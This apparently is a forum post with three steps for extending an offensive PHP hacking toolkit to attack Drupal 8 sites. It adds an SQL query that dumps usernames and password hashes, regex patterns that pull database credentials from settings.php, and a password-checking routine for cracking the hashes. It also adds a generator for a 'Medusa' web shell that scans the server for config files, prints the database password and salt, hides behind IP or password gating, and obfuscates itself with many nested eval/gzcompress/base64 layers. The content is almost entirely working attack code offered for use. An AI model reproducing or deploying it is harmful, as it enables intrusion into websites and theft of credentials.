Step 1:
Save the data below as /forums/drupal/drupalc.php
<?phpclass Crypt {public static function randomBytes($count) {return random_bytes($count);}public static function hmacBase64($data, $key) {if (!is_scalar($data) || !is_scalar($key)) {throw new \InvalidArgumentException('Both parameters passed to \Drupal\Component\Utility\Crypt::hmacBase64 must be scalar values.');}$hmac = base64_encode(hash_hmac('sha256', $data, $key, TRUE));return str_replace(['+', '/', '='], ['-', '_', ''], $hmac);}public static function hashBase64($data) {$hash = base64_encode(hash('sha256', $data, TRUE));return str_replace(['+', '/', '='], ['-', '_', ''], $hash);}public static function hashEquals($known_string, $user_string) {if (function_exists('hash_equals')) {return hash_equals($known_string, $user_string);}else {if (!is_string($known_string)) {trigger_error(sprintf("Expected known_string to be a string, %s given", gettype($known_string)), E_USER_WARNING);return FALSE;}if (!is_string($user_string)) {trigger_error(sprintf("Expected user_string to be a string, %s given", gettype($user_string)), E_USER_WARNING);return FALSE;}$known_len = strlen($known_string);if ($known_len !== strlen($user_string)) {return FALSE;}$result = 0;for ($i = 0; $i < $known_len; $i++) {$result |= (ord($known_string[$i]) ^ ord($user_string[$i]));}return $result === 0;}}public static function randomBytesBase64($count = 32) {return str_replace(['+', '/', '='], ['-', '_', ''], base64_encode(static::randomBytes($count)));}}class PhpassHashedPassword implements PasswordInterface {const MIN_HASH_COUNT = 7;const MAX_HASH_COUNT = 30;const HASH_LENGTH = 55;public static $ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';protected $countLog2;function __construct($countLog2) {$this->countLog2 = $this->enforceLog2Boundaries($countLog2);}protected function base64Encode($input, $count) {$output = '';$i = 0;do {$value = ord($input[$i++]);$output .= static::$ITOA64[$value & 0x3f];if ($i < $count) {$value |= ord($input[$i]) << 8;}$output .= static::$ITOA64[($value >> 6) & 0x3f];if ($i++ >= $count) {break;}if ($i < $count) {$value |= ord($input[$i]) << 16;}$output .= static::$ITOA64[($value >> 12) & 0x3f];if ($i++ >= $count) {break;}$output .= static::$ITOA64[($value >> 18) & 0x3f];} while ($i < $count);return $output;}protected function generateSalt() {$output = '$S$';$output .= static::$ITOA64[$this->countLog2];$output .= $this->base64Encode(Crypt::randomBytes(6), 6);return $output;}protected function enforceLog2Boundaries($count_log2) {if ($count_log2 < static::MIN_HASH_COUNT) {return static::MIN_HASH_COUNT;}elseif ($count_log2 > static::MAX_HASH_COUNT) {return static::MAX_HASH_COUNT;}return (int) $count_log2;}protected function crypt($algo, $password, $setting) {if (strlen($password) > PasswordInterface::PASSWORD_MAX_LENGTH) {return FALSE;}$setting = substr($setting, 0, 12);if ($setting[0] != '$' || $setting[2] != '$') {return FALSE;}$count_log2 = $this->getCountLog2($setting);if ($count_log2 != $this->enforceLog2Boundaries($count_log2)) {return FALSE;}$salt = substr($setting, 4, 8);if (strlen($salt) != 8) {return FALSE;}$count = 1 << $count_log2;$hash = hash($algo, $salt . $password, TRUE);do {$hash = hash($algo, $hash . $password, TRUE);} while (--$count);$len = strlen($hash);$output = $setting . $this->base64Encode($hash, $len);$expected = 12 + ceil((8 * $len) / 6);return (strlen($output) == $expected) ? substr($output, 0, static::HASH_LENGTH) : FALSE;}public function getCountLog2($setting) {return strpos(static::$ITOA64, $setting[3]);}public function hash($password) {return $this->crypt('sha512', $password, $this->generateSalt());}public function check($password, $hash) {if (substr($hash, 0, 2) == 'U$') {$stored_hash = substr($hash, 1);$password = md5($password);}else {$stored_hash = $hash;}$type = substr($stored_hash, 0, 3);switch ($type) {case '$S$':// A normal Drupal 7 password using sha512.$computed_hash = $this->crypt('sha512', $password, $stored_hash);break;case '$H$':// phpBB3 uses "$H$" for the same thing as "$P$".case '$P$':// A phpass password generated using md5. This is an// imported password or from an earlier Drupal version.$computed_hash = $this->crypt('md5', $password, $stored_hash);break;default:return FALSE;}return $computed_hash && Crypt::hashEquals($stored_hash, $computed_hash);}}interface PasswordInterface {const PASSWORD_MAX_LENGTH = 512;public function hash($password);public function check($password, $hash);}/* Drupal */$_PROPERTIES = array();$_PROPERTIES['name'] = "Drupal8";$_PROPERTIES['version'] = "8.x";$_PROPERTIES['usernamefield'] = "name";$_PROPERTIES['emailfield'] = "mail";$_PROPERTIES['hashfield'] = "pass";$_PROPERTIES['tablename'] = "users_field_data";$_PROPERTIES['tableprefix'] = "drli_";$_PROPERTIES['filename'] = "drupal/drupalc.php";// use post variables instead if values are different from defaultif(isset($_POST['iUseDefault']) && $_POST['iUseDefault']==0){$_PROPERTIES['usernamefield'] = @mysql_real_escape_string($_POST['sUserNameField']);$_PROPERTIES['emailfield'] = @mysql_real_escape_string($_POST['sEmailField']);$_PROPERTIES['hashfield'] = @mysql_real_escape_string($_POST['sHashField']);$_PROPERTIES['tablename'] = @mysql_real_escape_string($_POST['sTableName']);$_PROPERTIES['tableprefix'] = @mysql_real_escape_string($_POST['sTablePrefix']);}$_PROPERTIES['queryraw'] = array();$_PROPERTIES['queryraw']['attack'] = "SELECT ".$_PROPERTIES['usernamefield']." AS crackuser,".$_PROPERTIES['hashfield']." AS crackpass".(isset($_PROPERTIES['saltfield']) ? ",".$_PROPERTIES['saltfield']." AS crackhash" : "")." FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename']." WHERE ".$_PROPERTIES['usernamefield']."<>''";$_PROPERTIES['queryraw']['getemail'] = "SELECT ".$_PROPERTIES['emailfield']." AS temail FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename']." WHERE ".$_PROPERTIES['usernamefield']."='/user/'";if(isset($_GET['JSON'])){session_cache_limiter('nocache');header('Expires: '.gmdate('r',0));header('Content-type: application/json');echo json_encode($_PROPERTIES);}$_SYSTEM = array();$_SYSTEM['name'] = $_PROPERTIES['name'];$_SYSTEM['version'] = $_PROPERTIES['version'];$_SYSTEM['patterns'] = array();$_SYSTEM['patterns']['user'] = '/\'username\'\s+=>\s+\'(.*)?\'/';$_SYSTEM['patterns']['password'] = '/\'password\'\s+=>\s+\'(.*)?\'/';$_SYSTEM['patterns']['host'] = '/\'host\'\s+=>\s+\'(.*)?\'/';$_SYSTEM['patterns']['database'] = '/\'database\'\s+=>\s+\'(.*)?\'/';$_SYSTEM['patterns']['prefix'] = '/\'prefix\'\s+=>\s+\'(.*)?\'/';$_SYSTEM['patterns']['salt'] = '/\$settings[\'hash_salt\']\s+=\s+\'.*\'/';$_SYSTEM['file'] = "sites/default/settings.php";?>
step 2:
Replace the MedusaShell function in crackmeclass.php with:/* creates a medusa shell */function MedusaShell($aSystem,$aOptions){$sShell = "set_time_limit(0);\n";$sTemplate = "";if(isset($aOptions['ip'])){// ip protection$sShell .= "if(\$_SERVER['REMOTE_ADDR']!=\"".$aOptions['ip']."\"){\n";$sShell .= " header(\"Location: http://www.google.com\");\n";$sShell .= " exit;\n";$sShell .= "}\n";}if(isset($aOptions['pass'])){// password protection$sShell .= "if(!isset(\$_POST['sPass']) || sha1(\$_POST['sPass'])!=\"".sha1($aOptions['pass'])."\"){\n";$sShell .= " echo'<html>\n";$sShell .= " <head></head>\n";$sShell .= " <body>\n";$sShell .= " <form method=\"post\">\n";$sShell .= " <input type=\"password\" name=\"sPass\" /> <input type=\"submit\" name=\"submit\" value=\"Submit\" />\n";$sShell .= " </form>\n";$sShell .= " </body>\n";$sShell .= " </html>';\n";$sShell .= " exit;\n";$sShell .= "}\n";}// create shell based on system array$sShell .= "\$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(\$_SERVER['DOCUMENT_ROOT']),RecursiveIteratorIterator::CHILD_FIRST);\n";$sShell .= "foreach(\$iterator as \$path){\n";$sShell .= " if(!\$path->isDir()){\n";$sShell .= " \$sPath = \$path->__toString();\n";$sShell .= " \$sFile = \"".$aSystem['file']."\";\n";$sShell .= " if(strtoupper(substr(PHP_OS,0,3))==='WIN'){\n";$sShell .= " \$sFile = str_replace(\"/\",\"\\\\\",\$sFile);\n";$sShell .= " }\n";$sShell .= " if(strpos(\$sPath,\$sFile)!==false){\n";$sShell .= " \$sData = file_get_contents(\$sPath);\n";$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['user'])."',\$sData,\$aUser);\n";$sShell .= " if(!isset(\$aUser[1])){\n";$sShell .= " continue;\n";$sShell .= " }\n";$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['database'])."',\$sData,\$aDB);\n";$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['password'])."',\$sData,\$aPass);\n";$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['host'])."',\$sData,\$aHost);\n";$sShell .= " if(isset(\$aSystem['patterns']['salt'])){\n";$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['salt'])."',\$sData,\$aSalt);\n";$sShell .= " }\n";$sShell .= " if(isset(\$aSystem['patterns']['prefix'])){\n";$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['prefix'])."',\$sData,\$aPrefix);\n";$sShell .= " }\n";$sShell .= " \$sResult = \"<b>user:</b> \".\$aUser[1].\"<br />\";\n";$sShell .= " \$sResult .= \"<b>pass:</b> \".\$aPass[1].\"<br />\";\n";$sShell .= " \$sResult .= \"<b>host:</b> \".\$aHost[1].\"<br />\";\n";$sShell .= " \$sResult .= \"<b>database:</b> \".\$aDB[1].\"<br />\";\n";$sShell .= " if(isset(\$aSystem['patterns']['prefix'])){\n";$sShell .= " \$sResult .= \"<b>prefix:</b> \".\$aPrefix[1].\"<br />\";\n";$sShell .= " }\n";$sShell .= " if(isset(\$aSystem['patterns']['salt'])){\n";$sShell .= " \$sResult .= \"<b>hash:</b> \".\$aSalt[1].\"<br />\";\n";$sShell .= " }\n";$sShell .= " die(\$sResult);\n";$sShell .= " }\n";$sShell .= " }\n";$sShell .= "}\n";$sShell .= "die(\"Failed to get login information.\");\n";if(isset($aOptions['encrypt'])){// source protectionif($aOptions['encrypt']=="normal"){$sShell = "eval(base64_decode('".base64_encode($sShell)."'));\n";}else{$sEncoder = "\$sPull = \"leverage the inflatable base 4/16 and_or gza jump to tor strings code compressing unescaped\";\n";$sEncoder .= "\$aPull = explode(\" \",\$sPull);\n";$sEncoder .= "\$aF = array();\n";$sEncoder .= "\$aF[] = \$sPull[1].\$sPull[2].\$sPull[5].\$sPull[0];\n";//eval$sEncoder .= "\$aF[] = substr(\$sPull,57,3).\$sPull[4].\$aF[0][0].\$aF[0][1];\n";//strrev$sEncoder .= "\$aF[] = substr(\$sPull,41,2).substr(\$sPull,13,6).\$aF[0][0];\n";//gzinflate$sEncoder .= "\$aF[] = \$aF[2][0].\$aF[2][1].\$sPull[(strpos(\$sPull,\"_\")-1)].\$aF[0][0].substr(\$aF[2],4);\n";//gzdeflate$sEncoder .= "\$aF[] = \$aPull[3].str_replace(\"1/\",\"\",\$aF[1](\$aPull[4])).\"_\".\$aF[0][0].\$aF[2][3].\$aPull[11];\n";//base64_encode$sEncoder .= "\$aF[] = substr(\$aF[4],0,7).\$aF[3][2].\$aF[0][0].substr(\$aF[4],9);\n";//base64_decode$sEncoder .= "\$aF[] = substr(\$aF[3],0,2).substr(\$aPull[13],0,2).substr(\$aPull[12],0,8);\n";//gzuncompress$sEncoder .= "\$aF[] = str_replace(substr(\$aPull[13],0,2),\"\",\$aF[6]);\n";//gzcompress// encode and decode functions$_ENCODE = array();$_ENCODE[0] = array(7,"gzcompress");$_ENCODE[1] = array(4,"base64_encode");$_DECODE = array();$_DECODE[0] = array(6,"gzuncompress");$_DECODE[1] = array(5,"base64_decode");// good luck decrypting the shell :p$iEncryptions = count($_ENCODE)-1;$iEncryptionLoops = mt_rand(120,150);for($x=0;$x<$iEncryptionLoops;$x++){$iEncryption = mt_rand(0,$iEncryptions);$sShell = "\$aF[".$_ENCODE[$iEncryption][0]."]('".$_ENCODE[$iEncryption][1]($sShell)."')";}$sShell = $sEncoder.$sShell.";";}}if(isset($aOptions['shellcreate'])){// save sourcereturn($this->WriteF($aOptions['shellcreate'],"<?php\n".$sShell."?>","w"));}else{$sShell = str_replace("\n","<br />\n",htmlspecialchars("<?php\n".$sShell)."?>");return($sShell);}}
step 3:
Add this to the UserLogin function:
case"Drupal8":$cDrupal8 = new PhpassHashedPassword();return($cDrupal8->check($sPass,$sHash) ? true : false);break;